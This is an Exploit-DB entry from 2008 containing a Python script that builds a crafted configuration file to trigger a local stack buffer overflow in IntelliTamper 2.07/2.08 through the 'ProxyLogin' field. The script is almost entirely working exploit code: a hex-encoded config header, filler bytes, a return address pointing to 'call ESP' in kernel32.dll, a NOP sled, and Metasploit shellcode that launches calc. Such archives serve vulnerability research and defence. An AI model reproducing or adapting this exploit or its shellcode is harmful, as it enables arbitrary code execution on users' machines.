IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow

EDB-ID:

7608


Author:

His0k4

Type:

local


Platform:

Windows

Date:

2008-12-29


#usage: exploit.py
print "**************************************************************************"
print " IntelliTamper 2.07/2.08 (ProxyLogin) Local Stack Overflow\n"
print " Author: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
         	

			
header = (
	"\x2F\x2F\x20\x49\x6E\x74\x65\x6C\x6C\x69\x54\x61\x6D\x70"
	"\x65\x72\x20\x63\x6F\x6E\x66\x69\x67\x75\x72\x61\x74\x69"
	"\x6F\x6E\x20\x66\x69\x6C\x65\x0A\x0A\x46\x6F\x6C\x64\x65"
	"\x72\x73\x44\x69\x63\x74\x69\x6F\x6E\x6E\x61\x72\x79\x3D"
	"\x44\x69\x63\x74\x69\x6F\x6E\x6E\x61\x72\x79\x43\x6C\x61"
	"\x73\x73\x69\x63\x2E\x74\x78\x74\x0A\x54\x65\x78\x74\x43"
	"\x61\x74\x61\x6C\x6F\x67\x3D\x43\x3A\x5C\x50\x72\x6F\x67"
	"\x72\x61\x6D\x20\x46\x69\x6C\x65\x73\x5C\x49\x6E\x74\x65"
	"\x6C\x6C\x69\x54\x61\x6D\x70\x65\x72\x5C\x49\x6E\x74\x65"
	"\x6C\x6C\x69\x54\x61\x6D\x70\x65\x72\x5F\x55\x53\x2E\x63"
	"\x61\x74\x0A\x55\x73\x65\x50\x72\x6F\x78\x79\x41\x75\x74"
	"\x68\x3D\x31\x0A\x50\x72\x6F\x78\x79\x4C\x6F\x67\x69\x6E"
	"\x3D"
	)
	
header2 = "\x0A\x50\x72\x6F\x78\x79\x50\x61\x73\x73\x77\x6F\x72\x64\x3D"	
			
buff = "\x41" * 245

EIP = "\x5D\x38\x82\x7C" #call ESP from kernel32.dll

nop = "\x90" * 12  #Blah Blah :D

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
	"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
	"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
	"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
	"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
	"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
	"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
	"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
	"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
	"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
	"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
	"\xac\x2c\xc9\x40"
    )

exploit = header + buff + EIP + nop + shellcode + header2

try:
    out_file = open("exploit.cfg",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2008-12-29]